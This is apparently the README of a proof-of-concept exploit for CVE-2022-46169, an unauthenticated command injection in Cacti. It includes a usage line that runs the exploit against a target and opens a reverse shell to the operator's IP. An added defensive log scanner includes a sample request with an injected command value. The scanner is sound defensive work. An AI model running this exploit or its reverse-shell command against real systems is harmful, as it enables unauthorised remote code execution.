devilgothies / CVE-2022-46169

PoC for CVE-2022-46169, which affects Cacti version 1.2.22

CVE-2022-46169 POC

This is a Proof of Concept (POC) script for the CVE-2022-46169 vulnerability that affects Cacti version 1.2.22.

Description

CVE-2022-46169 is an unauthenticated command injection vulnerability in Cacti versions through 1.2.22 that leads to remote code execution as the www-data user. The vulnerability is caused by improper validation of user input in the "host_id" parameter of the "remote_agent.php" file.
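
A defensive companion to the description above, added here and not part of the PoC repository: a web-log check that flags requests to remote_agent.php whose host_id is not a plain integer or whose parameters carry shell metacharacters. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request part of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# Characters that have no place in an integer id but matter to a shell.
SHELL_META = re.compile(r"[;|&`$(){}<>\n\r]")
ENDPOINT = "remote_agent.php"  # file named in the description above


def inspect_line(line):
    """Return (client_ip, reasons) for a suspicious request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/" + ENDPOINT):
        return None
    reasons = []
    # parse_qsl URL-decodes values, so %3B is inspected as ';'.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == "host_id" and not re.fullmatch(r"[0-9]+", value):
            reasons.append("non-numeric host_id")
        if SHELL_META.search(value):
            reasons.append(f"shell metacharacter in {name}")
    return (m.group("ip"), reasons) if reasons else None


def scan(lines):
    """Collect findings for every flagged line."""
    return [hit for hit in map(inspect_line, lines) if hit]


# Constructed sample log lines, for illustration only.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2023:10:00:00 +0000] "GET /cacti/remote_agent.php?host_id=1 HTTP/1.1" 200 12',
    '192.0.2.55 - - [01/Jan/2023:10:00:05 +0000] "GET /cacti/remote_agent.php?host_id=1%3Becho+test HTTP/1.1" 200 54',
    '192.0.2.10 - - [01/Jan/2023:10:00:09 +0000] "GET /cacti/graph_view.php?host_id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, ", ".join(reasons))
```

Any hit from an address that is not a configured poller is worth triage, since the endpoint is meant for pollers only.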

Usage

python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>

Replace <TARGET_URL> with the URL of the target Cacti installation, <YOUR_IP> with the IP address of the machine where you want to receive the reverse shell, and <YOUR_PORT> with the port number where you want to receive the reverse shell.

Example:

python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337

Disclaimer

This POC script is for educational purposes only. Use it at your own risk. The author of this script is not responsible for any damage caused by the use of this script.

References

CVE-2022-46169 - CVE entry for the vulnerability.
Cacti Security Advisories in Github
